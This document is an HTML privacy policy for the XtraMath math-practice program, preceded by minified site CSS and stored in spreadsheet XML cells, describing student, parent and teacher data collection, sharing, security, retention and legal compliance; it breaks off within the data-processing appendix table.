    <t>9px;text-align:center;text-decoration:none}.button--image{background:0 0;display:inline-block;margin-top:1rem;padding:0;text-align:center}.button--image svg{display:inline-block;height:36px;margin:0 auto;max-width:100%;text-align:center;text-decoration:none!important;width:auto}.button--image svg *{text-decoration:none}.button--image.button--large{height:48px;line-height:48px}.button--image.button--large svg{height:48px}a.button,a.button--image{text-decoration:none}a svg,a symbol,a use,a:visited svg,a:visited symbol,a:visited use{fill:initial;color:initial}.dropdown{position:relative;right:-.75rem;top:1rem;z-index:99}.dropdown.static{left:1rem;right:1rem;top:0;width:auto}.dropdown.static::before{left:.75rem;right:auto}.dropdown.static .dropdown__list{box-shadow:none;position:static}.dropdown.static .label{display:none}.dropdown__list{background-color:#fff;border-radius:.5rem;box-shadow:2px 2px 8px #0002;list-style:none;margin:0;overflow:hidden;padding:0 0 .5rem;position</t>
  </si>
  <si>
    <t>: absolute;top:100%;transform:scaleY(0);transform-origin:center top;opacity:0;right:0;z-index:-1}.dropdown__list .label{background-color:#ddd;font-size:12px;font-weight:700;padding:.5rem}.dropdown__list .label+li{margin-top:2px}.dropdown__list li{border-bottom:none;font-size:14px;margin:0;padding:0}.dropdown__list li+li a{border-top:1px solid #fafafa}.dropdown__list a{display:block;margin:-2px 0;padding:0 .5rem;text-decoration:none}.notify-banner{background-color:#e5e5e5;display:none;bottom:0;left:0;right:0;z-index:9;padding:.5rem 1rem}@media (min-width:480px){.notify-banner{padding-left:1.5rem;padding-right:1.5rem}}@media (min-width:640px){.grid--flush .grid__column--full .block__container{max-width:CALC(1200px - 2rem)}.notify-banner{padding-left:2rem;padding-right:2rem}}@media (min-width:1024px){.grid--flush .grid__column--full .block__container{max-width:CALC(1200px - 4rem)}.notify-banner{padding-left:4rem;padding-right:4rem}}.notify-banner__container{align-items:center;-webkit-box-align:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-left:auto;margin-right:auto;max-width:1200px;text-align:center}.notify-banner__copy{font-size:80%;margin-bottom:0;width:100%}@media (min-width:480px){.notify-banner__container{-ms-flex-wrap:nowrap;flex-wrap:nowrap}.notify-banner__copy{-webkit-box-flex:1;flex-grow:1;-ms-flex-positive:1;text-align:left;width:auto}}.notify-banner__button{color:inherit;line-height:1;margin-top:.25rem;text-align:center;width:100%}@media (min-width:480px){.notify-banner__button{-ms-flex-negative:0;flex-shrink:0;margin-left:1rem;margin-top:0;width:auto}}.notify-banner__button .button{color: inherit}.notify-banner--referrals{background-color:#fef7bf}#announcement-banner .notify-banner__container{padding-right:2rem;position:relative}#announcement-banner .notify-banner__button{display:inline-block;margin-top:0;position:absolute;right:0;top:50%;transform:translateY(-50%);width:auto}#announcement-banner .notify-banner__button .button{line-height:1;padding:8px 12px 9px}.grid{align-items:center;-webkit-box-align:center;-webkit-box-pack:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-ms-flex-pack:center;-ms-flex-wrap:wrap;flex-wrap:wrap;justify-content:center;margin-left:-.5rem;margin-right:-.5rem}@media (min-width:640px){.grid{margin-left:-1rem;margin-right:-1rem}}.center-block{margin-left:auto;margin-right:auto}.grid--align-stretch{align-content:stretch;align-items:stretch;-webkit-box-align:stretch;-ms-flex-align:stretch}.grid--flush{margin-left:0;margin-right:0;overflow:hidden;position:relative}.grid--flush .grid__column{margin-bottom:0;margin-top:0;padding-left:0;padding-right:0;z-index:3}.grid--flush .grid__column&gt;*{z-index:3}.grid--flush .grid__column+.grid__column{margin-top:0}.grid--flush .grid__column.grid__column--full{width:100%}.grid--flush .grid__column</t>
  </si>
  <si>
    <t>[class*=image--]{margin-left:auto;margin-right:auto}.grid__column{flex-basis:auto;-ms-flex-preferred-size:auto;padding-left:.5rem;padding-right:.5rem;width:100%}.grid__column+.grid__column{margin-top:2rem}.grid__column.grid__column--full{width:100%}@media (min-width:640px){.grid__column{padding-left:1rem;padding-right:1rem;width:50%}.grid__column+.grid__column{margin-top:0}.grid__column--one-half-medium{width:50%}.header .header__nav .tag{bottom:1em;left:50%;position: absolute;transform:translateX(-50%)}}.header__inner{padding-left:.5rem;padding-right:.5rem;border-bottom:1px solid #e5e5e5}@media (min-width:480px){.header__inner,.header__mobile .menu&gt;li&gt;a{padding-left:1.5rem;padding-right:1.5rem}}@media (min-width:720px){.header__inner{padding-left:2rem;padding-right:2rem}}.header__sticky{background-color:#fff;min-width:320px;position:fixed;top:0;width:100%;z-index:99}.header__container{margin-left:auto;margin-right:auto;max-width:1200px}.header__nav{-webkit-box-pack:justify;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-pack:justify;height:60px;justify-content:space-between}.header__nav li{position:relative}.header__burger{-webkit-box-direction:normal;-webkit-box-orient:vertical;-webkit-box-pack:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:center;justify-content:center;text-align:center;width:32px}@media (min-width:640px){.header__burger{display:none}}.header__burger-icon{height:14px;margin-left:auto;margin-right:auto;position:relative;width:18px}.header__burger-icon span{background-color:#1d1d1d;height:2px;left:0;position:absolute;width:100%}.header__burger-icon span:not(:last-of-type){margin-bottom:4px}.header__burger-icon span:nth-of-type(1){top:0}.header__burger-icon span:nth-of-type(2),.header__burger-icon span:nth-of-type(3){top:6px}.header__burger-icon span:nth-of-type(4){top:12px}.header__burger-text{font-size:60%;margin-bottom:0;margin-top:2px}.header__logo{align-items:center;-webkit-box-align:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-ms-flex-negative:0;flex-shrink:0;height:60px;width:100px;padding-bottom:4px}@media (min-width:370px){.header__logo{width:140px}}@media (min-width:400px){.header__logo{width:160px}}@media (min-width:640px){.header__logo{margin-right:24px;max-width:100px}}@media (min-width:1024px){.header__inner{padding-left:4rem;padding-right:4rem}.header__logo{margin-right:32px;max-width:160px}}.header__list{display:-webkit-box;display:-ms-flexbox;display:flex;justify-content:space-evenly;list-style:none;margin:0}.header__list:first-of-type{-webkit-box-flex:1;flex-grow:1;-ms-flex-positive:1;margin-right:4px}@media (min-width:720px){.header__list:first-of-type{margin-right:8px}}.header__list--hide-mobile{display:none}@media (min-width:640px){.header__list--hide-mobile{display:-webkit-box;display:-ms-flexbox;display:flex}.header__list-item--show-mobile-only{display:none!important}}.header__list-item--show-mobile-only .button--image svg{height:24px}.header__list-item{align-items:center;-webkit-box-align:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;-ms-flex-negative:0;flex-shrink:0;height:60px;line-height:1;margin-left:2px;margin-right:2px;text-align:center;white-space:nowrap}.header__list-item:first-of-type{margin-left:0}.header__list-item:last-of-type{margin-right:0}.header__list-item:nth-last-child(2){margin-left:8px;margin-right:8px}@media (min-width:370px){.header__list-item:nth-last-child(2){margin-right:16px}}@media (min-width:720px){.header__list-item{margin-left:3px;margin-right:3px}}@media (min-width:800px){.header__list-item{margin-left:4px;margin-right:4px}}.header__list-item--hide-mobile{display:none}@media (min-width:640px){.header__list-item--hide-mobile{display:-webkit-box;display:-ms-flexbox;display:flex}.header__mobile .menu&gt;li&gt;a{padding-left:2rem;padding-right:2rem}}.header__link{align-items:center;border-bottom:4px solid transparent;border-top:4px solid transparent;-webkit-box-align:center;color:#1d1d1d;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;font-size:12px;font-weight:300;height:60px;padding-left:2px;padding-right:2px;text-decoration:none}@media (min-width:1200px){.header__link{font-size:14px}}.header .button--image svg{height:32px}.header__cart{align-items:center;-webkit-box-align:center;display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-align:center;padding:0 12px;position:relative}.header__cart-icon{width:24px}.header__cart-quantity{color:#ef7d00;font-size:14px;font-weight:700;left:50%;position:absolute;top:43%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}@media (min-width:1024px){.header__list-item{margin-left:8px;margin-right:8px}.header .button--image svg{height:36px}.header__mobile{background-color:#fff;bottom:0;display:none;overflow-y:auto;position:fixed;top:60px;width:100%;z-index:10}.header__mobile li{border-bottom:1px solid #e5e5e5;}.header__mobile .submenu{border-bottom: none}.header__mobile</t>
  </si>
  <si>
    <t>.submenu ul{border-top:1px solid #e5e5e5;list-style:none;margin:0 0 .5rem;}@media (min-width:480px){.header__mobile .submenu ul&gt;li&gt;a{padding-left:2.5rem}}.header__mobile a{color:#1d1d1d}.header__mobile i{float:right}@media (min-width:640px){.header__mobile .submenu ul&gt;li&gt;a{padding-left:3rem}.header__mobile{display:none!important}}.image{margin-left:auto;margin-right:auto;max-width:600px}.ratio-container{display:block;height:0;padding-bottom:100%;position:relative;width:100%}.ratio-container img{display:block;height:100%;left:0;position:absolute;top:0;width:100%}.header__mobile li,nav li{position:relative}.header__mobile .tag,nav .tag{background-color:orange;border-radius:2em;color:#fff;display:inline-block;font-family:GothamRounded,helvetica,arial,sans-serif;font-size:.5rem;font-weight:700;line-height:1;padding:.25em .75em;vertical-align:middle}@media (min-width:640px){nav
.tag{bottom:1em;left:50%;position:absolute;transform: translateX(-50%)}}.text-center</t>
  </si>
  <si>
    <t>[class*=image--]{margin-left:auto;margin-right:auto}.image--medium{max-width:450px}.ratio-container{display:block;height:0;padding-bottom:100%;position:relative;width:100%}.ratio-container img{display:block;height:100%;left:0;position:absolute;top:0;width:100%}.products__filters{padding:1rem 0}.products__filters .grid{justify-content:center}.products__filters .grid&gt;*{margin:0 .75rem}@media (max-width:639px){.products__filters .grid a{font-size:14px;margin:.25rem .75rem}}.products__header .section-label small{color:inherit;font-size:.75em}.product--list a{font</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;
      body {
        font-family: "HelveticaNeue", Arial, sans-serif;
        font-size: 10pt;
        color: #404040;
        padding: 20px;
      }
      .summary {
        font-family: Georgia;
        font-size: 11pt;
      }
      .term { margin-left: 30px; }
      li { padding-left: 20px; }
      a { color: #007AAB; }
      hr { color: #9AD7D2; }
      th { text-align: left; }
      table, th, td { border: 1px solid black; border-collapse: collapse; font-size: 9pt }
      th, td { padding: 8px; }
      p.footer { margin-bottom: 40px; }
    &lt;/style&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;XtraMath Privacy Policy&lt;/h1&gt;
    &lt;h2&gt; Introduction&lt;/h2&gt;
    &lt;p&gt;
      XtraMath is committed to protecting data privacy. We strictly adhere to this Privacy Policy, which
      explains what user data we collect and how we use it.</t>
  </si>
  <si>
    <t>This policy and our&amp;nbsp;&lt;a href="http://cdn0.xtramath.org/docs/en/terms-of-service.pdf" target="_blank" rel="noopener"&gt;Terms of Service&lt;/a&gt; are known collectively as our &amp;ldquo;Terms.&amp;rdquo; We may change these Terms from time to time, but will
      provide notice as specified in the Terms of Service document
    &lt;/p&gt;
    &lt;p&gt;&lt;i&gt;This policy is effective May 25, 2018, and replaces our&amp;nbsp;&lt;a href="http://cdn0.xtramath.org/docs/en/privacy-policy-2016-12-01.pdf" target="_blank" rel="noopener"&gt;prior privacy policy&lt;/a&gt;.&lt;/i&gt;&lt;/p&gt;
    &lt;h2&gt; Summary&lt;/h2&gt;
    &lt;ul&gt;
      &lt;li&gt;We collect  the minimum amount of data required to operate our program.&lt;/li&gt;
      &lt;li&gt;We use parents&amp;rsquo; and teachers&amp;rsquo; Personal Data to operate our program and, with their permission, to contact them about the program.&lt;/li&gt;
      &lt;li&gt;We use students&amp;rsquo; Personal Data only to operate our program.&lt;/li&gt;
      &lt;li&gt;We use de-identified student data to improve our program.&lt;/li&gt;
      &lt;li&gt;We protect student data and have signed the&amp;nbsp;&lt;a href="https://studentprivacypledge.org/privacy-pledge/" target="_blank" rel="noopener"&gt;Student Privacy Pledge&lt;/a&gt;.&lt;/li&gt;
      &lt;li&gt;We do not advertise to students, sell their data, or profile them in any way.&lt;/li&gt;
      &lt;li&gt;We comply with applicable data privacy laws, such as FERPA, COPPA, and GDPR.&lt;/li&gt;
      &lt;li&gt;We never sell user data to third parties.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;h2&gt; What Data We Collect&lt;/h2&gt;
    &lt;p&gt;
      XtraMath collects the minimum amount of data required to operate our program.</t>
  </si>
  <si>
    <t xml:space="preserve">Below we
      summarize the data we collect on students, teachers, and parents. For an up-to-date list that
      shows what user data we collect, and how we use that data, see Appendix B,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;Record of Data Processing&lt;/span&gt;.
    &lt;/p&gt;
    &lt;h3&gt;Definitions&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;b&gt;Data&lt;/b&gt; includes all information connected with a person&amp;rsquo;s or educational entity&amp;rsquo;s use of
        XtraMath. This includes, but is not limited to, Personal Data, metadata, usage and
        performance data.
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
      &lt;li&gt;&lt;b&gt;Personal Data&lt;/b&gt; includes any data that can directly or indirectly identify an individual
        person. For example: an email address is always considered Personal Data; a student&amp;rsquo;s
        grade level generally is not, but could be in conjunction with other information.
       &lt;/li&gt;
      &lt;li&gt;&lt;b&gt;School&lt;/b&gt; includes: individual schools; teachers acting on behalf of schools; school
        districts; and other local educational entities.
      </t>
  </si>
  <si>
    <t>&lt;/li&gt;
    &lt;/ul&gt;
    &lt;h3&gt;Student Data&lt;/h3&gt;
    &lt;p&gt;
      We collect a student&amp;rsquo;s first name, grade level, and program settings from the student&amp;rsquo;s parent or
      teacher. As the student uses XtraMath, we collect usage and performance data, such as when
      they signed in, how many questions they answered correctly, and how long it took them to
      answer questions. If a student signs in via a single sign-on provider, such as Google, we collect
      an identifier from the provider that allows us to authenticate their sign-in.</t>
  </si>
  <si>
    <t xml:space="preserve">We do&amp;nbsp;&lt;b&gt;not&lt;/b&gt; collect the
      student email address that may be used for such a sign-in.
     &lt;/p&gt;
    &lt;p&gt;
      Other personal information about the student could be inferred from data that we collect. If a
      student account belongs to a class, for example, then we could infer that they attend a certain
      school.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;h3&gt;Parent Data&lt;/h3&gt;
    &lt;p&gt;
      We collect a parent&amp;rsquo;s name and email address when they sign up for an account. If they sign up
      using a single sign-on provider, we also collect an identifier that allows us to authenticate their
      sign-in. We also collect some metadata and account settings, such as their time zone, the
      language they used to sign up, and their email preferences.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;p&gt;
       A parent supplies a password when they create an account. The password is hashed
      (scrambled) on the user&amp;rsquo;s computer before it is ever sent to XtraMath.</t>
  </si>
  <si>
    <t xml:space="preserve">We do not have access to
      a user&amp;rsquo;s original password, and cannot obtain it from the hashed version that we receive.
     &lt;/p&gt;
    &lt;p&gt;
      Other personal information about the parent could be inferred from data that we collect. For
      example, we could infer that a parent whose account is linked to a student account is the parent
      or guardian of that student.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;h3&gt;Teacher Data&lt;/h3&gt;
    &lt;p&gt;
      We collect the same data for teacher accounts as parent accounts, with a few additions. For
      example, we collect the name by which students address the teacher, such as &amp;ldquo;Ms. Smith.&amp;rdquo; We
      also collect information about each class that the teacher creates, such as its name and its end
      date.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;p&gt;
      Other personal information about the teacher could be inferred from data we collect. For
      example, we could infer that the teacher works at a specific school based on their email
      address.
     &lt;/p&gt;
    &lt;h2&gt;How We Use and Share Data&lt;/h2&gt;
    &lt;p&gt;
      XtraMath processes user data in order to establish and maintain accounts, to provide
      educational activities to students, to compile and deliver reports about those activities to
      teachers and parents, and to understand and improve our program&amp;rsquo;s effectiveness.</t>
  </si>
  <si>
    <t>For an
      up-to-date list that shows the specific types of user data we collect, and how we use that data,
      see Appendix B,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;Record of Data Processing&lt;/span&gt;.
     &lt;/p&gt;
    &lt;h3&gt;Student Data&lt;/h3&gt;
    &lt;p&gt;
       A student&amp;rsquo;s Personal Data is used internally to provide the student with appropriate educational
      activities, and to report their performance to their parents and teachers.</t>
  </si>
  <si>
    <t>We may access student
      Personal Data when providing customer support or investigating a reported issue with our
      program.
     &lt;/p&gt;
    &lt;h3&gt;Parent and Teacher Data&lt;/h3&gt;
    &lt;p&gt;
       A parent&amp;rsquo;s or teacher&amp;rsquo;s</t>
  </si>
  <si>
    <t xml:space="preserve">Personal Data is used internally for sign-in purposes and, with
      permission, to send them reports, announcements, and alerts related to XtraMath. We may
      access a parent&amp;rsquo;s or teacher&amp;rsquo;s Personal Data when providing them with requested support.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;h3&gt;Sharing Personal Data with Third Parties&lt;/h3&gt;
    &lt;p&gt; We release Personal Data to third parties only in the following circumstances:&lt;/p&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;i&gt;When the user requests the disclosure,&lt;/i&gt; such as a teacher sharing their class with
        another teacher.
       &lt;/li&gt;
      &lt;li&gt;&lt;i&gt;When the third party is a trusted service provider,&lt;/i&gt; and the data is required to adequately
        perform the service.</t>
  </si>
  <si>
    <t>We carefully vet our service providers and their security practices.
         For details, see Appendix A,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;List of Third Party Providers&lt;/span&gt;.
       &lt;/li&gt;
      &lt;li&gt;&lt;i&gt;When required by law or a court order.&lt;/i&gt;&lt;/li&gt;
      &lt;li&gt;&lt;i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In the event of a joint venture, sale or merger with a third party.&lt;/i&gt; The third party would be
        required to uphold our Terms, including our Privacy Policy for all existing accounts. We
        would provide advance notice before sharing data with that third party.
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;XtraMath never releases Personal Data for any kind of third-party advertising.&lt;/p&gt;
    &lt;h3&gt;Use of De-identified Data&lt;/h3&gt;
    &lt;p&gt;
       We may use de-identified usage data internally to analyze and improve our educational
      services, and to develop new products or features. We will never attempt to re-identify data that
      has been de-identified.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;p&gt;
       We may release de-identified data to educational researchers for the purpose of evaluating the
      effectiveness of our program. We will not release de-identified data unless we are confident it
      cannot be re-identified, due to the removal of all direct and indirect personal identifiers, and the
      educational researchers have agreed in writing that they will not attempt to re-identify any
      individuals, classes, or Schools.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;p&gt;
       We may use aggregate de-identified data, such as the number of users of our service, for
      promotional purposes.
     &lt;/p&gt;
    &lt;h2&gt;How We Securely Store Data&lt;/h2&gt;
    &lt;p&gt;
      XtraMath takes security seriously.</t>
  </si>
  <si>
    <t>We implement a variety of industry-standard security
      measures to prevent any unauthorized access to our users&amp;rsquo; data. Such measures include, but
      are not limited to: data minimization; encrypting data in transit via HTTPS; hashing sensitive
      data, like passwords; deletion of outdated data; locked physical facilities; employee training; and
      administrator account security.
     &lt;/p&gt;
    &lt;h3&gt;Data Storage and International Transfer&lt;/h3&gt;
    &lt;p&gt;
      XtraMath stores and processes all data on servers in the United States.</t>
  </si>
  <si>
    <t xml:space="preserve">All servers that store
      XtraMath data are operated by trusted third party processors with whom we have contractual
      Data Processing Addendums. Our providers are certified under the&amp;nbsp;&lt;a href="https://www.privacyshield.gov/welcome" target="_blank" rel="noopener"&gt;EU-US Privacy Shield and Swiss-US Privacy Shield&lt;/a&gt;, to better protect the data of our international users. For details, see
      Appendix A,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;List of Third Party Providers&lt;/span&gt;.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;h3&gt;Data Breach Response&lt;/h3&gt;
    &lt;p&gt;
      While we use industry-standard practices to safeguard data, no service can guarantee absolute
      data security. We have a Breach Response Plan, which we will follow if we ever discover that
      Personal Data has been accessed improperly. As part of our response, we will: take action to
      stop further data loss or unauthorized access; investigate how the breach occurred; promptly
      contact all affected users via email; and contact law enforcement and government agencies
      when appropriate.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;h2&gt;Data Retention and Deletion&lt;/h2&gt;
    &lt;p&gt;
      XtraMath retains Personal Data only for as long as necessary to ensure continuity of math
      skill-building for students, and for the convenience of parents and teachers. We close user
      accounts, and delete all associated identifiable data, upon request. Most types of data are also
      deleted automatically after a certain amount of time has passed.</t>
  </si>
  <si>
    <t>For details, see Appendix B,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;Record of Data Processing&lt;/span&gt;.
     &lt;/p&gt;
    &lt;p&gt;
       We may retain de-identified, aggregate data, which cannot identify any individual user, for
      research and program improvement purposes.</t>
  </si>
  <si>
    <t>Such data is deleted once no longer necessary
      for these purposes.
     &lt;/p&gt;
    &lt;p&gt;We will provide certification of data deletion upon request.&lt;/p&gt;
    &lt;h2&gt;Compliance with Data Privacy Laws&lt;/h2&gt;
    &lt;p&gt;
      XtraMath intends to comply with the data privacy and data protection laws of all jurisdictions
      where it operates. See the XtraMath and Student Data Privacy whitepaper for the latest
      information on compliance.</t>
  </si>
  <si>
    <t>Some specific examples of legislation that we comply with are
      described below.
     &lt;/p&gt;
    &lt;h3&gt;United States&lt;/h3&gt;
    &lt;p&gt;&lt;b&gt;Children&amp;rsquo;s Online Privacy Protection Act (COPPA):&lt;/b&gt; As a non-profit organization, XtraMath is
      not subject to&amp;nbsp;&lt;a href="https://www.ftc.gov/tips-advice/business-center/guidance/complying-coppa-frequently-asked-questions#General%20Questions" target="_blank" rel="noopener"&gt;COPPA&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Nevertheless, we fully comply with the law as if we were subject to it.
       Children under the age of 13 may not create accounts. We only collect usage and performance
      data from students as a result of their performing educational activities, and we only use that
      data for educational purposes.</t>
  </si>
  <si>
    <t>If we gain actual knowledge that a child is using XtraMath
      without the appropriate consent, we terminate the account.
     &lt;/p&gt;
    &lt;p&gt;&lt;b&gt;Family Education Rights Protection Act (FERPA):&lt;/b&gt; Schools in the United States may provide
      student data to XtraMath while complying with&amp;nbsp;&lt;a href="https://studentprivacy.ed.gov/node/548/" target="_blank" rel="noopener"&gt;FERPA&lt;/a&gt;.</t>
  </si>
  <si>
    <t>When a School provides us with a
      student&amp;rsquo;s Personal Data (or PII — Personally Identifiable Information) under the FERPA school
      official exemption, they remain in control of that data. XtraMath will only use and disclose that
      data as specified in our Terms and as allowed by law.
     &lt;/p&gt;
    &lt;h3&gt;International&lt;/h3&gt;
    &lt;p&gt;&lt;b&gt;General Data Protection Regulation (GDPR):&lt;/b&gt;</t>
  </si>
  <si>
    <t>XtraMath affirms and respects all data subject's
      rights under&amp;nbsp;&lt;a href="https://gdpr-info.eu/"&gt;GDPR&lt;/a&gt;. We minimize the data we collect and process, and use data only as
      described in this policy. For detailed information about what data we process, for what purpose,
      for how long, and our basis for doing so under the GDPR, see Appendix B,&amp;nbsp;&lt;span style="text-decoration: underline"&gt;Record of Data Processing&lt;/span&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">To object to processing, or to request data deletion or access, contact our Data
      Protection Officer at&amp;nbsp;&lt;a href="mailto://privacy@xtramath.org"&gt;privacy@xtramath.org&lt;/a&gt;.
     &lt;/p&gt;
    &lt;h2&gt;Cookies and Local Storage&lt;/h2&gt;
    &lt;p&gt;&lt;i&gt;XtraMath intends to discontinue the use of cookies by August 1, 2018.&lt;/i&gt;&lt;/p&gt;
    &lt;p&gt;XtraMath uses two types of cookies. These cookies can be cleared via browser settings -&amp;nbsp;&lt;a href="https://www.aboutcookies.org/how-to-control-cookies/" target="_blank" rel="noopener"&gt;aboutcookies.org&lt;/a&gt; provides cookie management instructions for many specific browsers.
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
        &lt;li&gt;&lt;b&gt;Google Analytics&lt;/b&gt; cookies allow us to see data such as the number of site visitors we
          get, and which pages they visit the most.
         &lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Vimeo&lt;/b&gt; cookies are stored when users play the videos on our homepage, and primarily
          keep track of the video player settings.
         &lt;/li&gt;
      &lt;/ul&gt;
    &lt;/p&gt;
    </t>
  </si>
  <si>
    <t>&lt;p&gt;
       The XtraMath website uses &amp;ldquo;LocalStorage&amp;rdquo; files to remember a user&amp;rsquo;s sign-in information (if they
      choose to do so). We also use &amp;ldquo;SessionStorage&amp;rdquo; to improve performance during student
      activities by temporarily storing activity data on the device.</t>
  </si>
  <si>
    <t xml:space="preserve">Use of LocalStorage and
      SessionStorage is not required to use XtraMath. Users can remove remembered sign-in
      information at any time via the appropriate sign-in page. Users can also clear all LocalStorage
      by using the &amp;ldquo;Clear now&amp;rdquo; button on our&amp;nbsp;&lt;a href="https://xtramath.org/#/home/support" target="_blank" rel="noopener"&gt;support page&lt;/a&gt;, or via browser settings.
    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
    &lt;p&gt;
       The XtraMath mobile apps use application data for the same purposes as browser LocalStorage
      and SessionStorage. Users can still remove remembered sign-in information via the app&amp;rsquo;s
      sign-in pages.</t>
  </si>
  <si>
    <t xml:space="preserve">Uninstalling the app will remove all locally stored data. Some devices also allow
      users to clear locally stored app data without uninstalling the app.
     &lt;/p&gt;
    &lt;h2&gt;Contact Us&lt;/h2&gt;
    &lt;p&gt;
      </t>
  </si>
  <si>
    <t xml:space="preserve">For data privacy questions or concerns, to object to processing, or to request access to or
      deletion of your or your child&amp;rsquo;s Personal Data, email us at&amp;nbsp;&lt;a href="mailto://privacy@xtramath.org"&gt;privacy@xtramath.org&lt;/a&gt;. You may also
      write to us at: XtraMath, 4700 42nd Ave SW #580, Seattle, WA 98116
    &lt;/p&gt;
    &lt;h2&gt;Appendix A: List of Third Party Providers&lt;/h2&gt;
    &lt;p&gt;
       This list will be kept up-to-date to include all third-party providers with which XtraMath shares
      user data.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;table&gt;
      &lt;tr&gt;
        &lt;th&gt;Provider Name&lt;/th&gt;
        &lt;th&gt;Data shared with Provider&lt;/th&gt;
        &lt;th&gt;Purpose&lt;/th&gt;
        &lt;th&gt;Relevant Policies&lt;/th&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;AWS&lt;/td&gt;
        &lt;td&gt;
          User account data, including
          name, email address, and
          program usage.
         &lt;/td&gt;
        &lt;td&gt;Database hosting via remote servers&lt;/td&gt;
        &lt;td&gt;&lt;a href="https://aws.amazon.com/privacy/" target="_blank" rel="noopener"&gt;Privacy Policy&lt;/a&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Google&lt;/td&gt;
        &lt;td&gt;Anonymous ID created by cookie&lt;/td&gt;
        &lt;td&gt;Website Analytics&lt;/td&gt;
        &lt;td&gt;&lt;a href="https://policies.google.com/privacy" target="_blank" rel="noopener"&gt;Privacy Policy&lt;/a&gt;&lt;br/&gt;&lt;a href="https://tools.google.com/dlpage/gaoptout" target="_blank" rel="noopener"&gt;Opt-out Browser Add-on&lt;/a&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Maxmind&lt;/td&gt;
        &lt;td&gt;IP adddress&lt;/td&gt;
        &lt;td&gt;Geolocation Service&lt;/td&gt;
        &lt;td&gt;&lt;a href="https://www.maxmind.com/en/privacy_policy" target="_blank" rel="noopener"&gt;Privacy Policy&lt;/a&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Vimeo&lt;/td&gt;
        &lt;td&gt;Anonymous ID created by cookie, video player settings&lt;/td&gt;
        &lt;td&gt;
          Enable playback of embedded
          videos (remember volume, if
          video is paused, etc)
        &lt;/td&gt;
        &lt;td&gt;&lt;a href="https://vimeo.com/privacy"&gt;Privacy Policy&lt;/a&gt;&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
    &lt;h2&gt;Appendix B: Record of Data Processing&lt;/h2&gt;
    &lt;p&gt;
      </t>
  </si>
  <si>
    <t xml:space="preserve">We have compiled this record in order to provide users with as much transparency as possible
      into how we use their data. This record also helps us to comply with European law. Unless
      otherwise noted in the record below, we process user data based on our legitimate interests.
    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
    &lt;table&gt;
      &lt;tr&gt;
        &lt;th&gt;Account Type&lt;/th&gt;
        &lt;th&gt;Type of Data&lt;/th&gt;
        &lt;th&gt;Processing Purpose&lt;/th&gt;
        &lt;th&gt;Deletion&lt;/th&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td rowspan="5"&gt;Student&lt;/td&gt;
        &lt;td&gt;First name, PIN, parent or teacher email, class&lt;/td&gt;
        &lt;td&gt;Account access and identification&lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;1&lt;/sup&gt;.
           Some information is deleted upon removal from the class or linked account.
         &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Single-sign-on provider and hashed ID&lt;/td&gt;
        &lt;td&gt;Account access using optional 3rd party credential&lt;/td&gt;
        &lt;td&gt;Upon request or account closure&lt;sup&gt;1&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Grade level&lt;/td&gt;
        &lt;td&gt;
          Determine initial activity level.
          </t>
  </si>
  <si>
    <t xml:space="preserve">When de-identified and
          aggregated, used to analyze
          program usage.
         &lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;1&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;
          Program settings: current
          program, UI options, preferred language, etc.
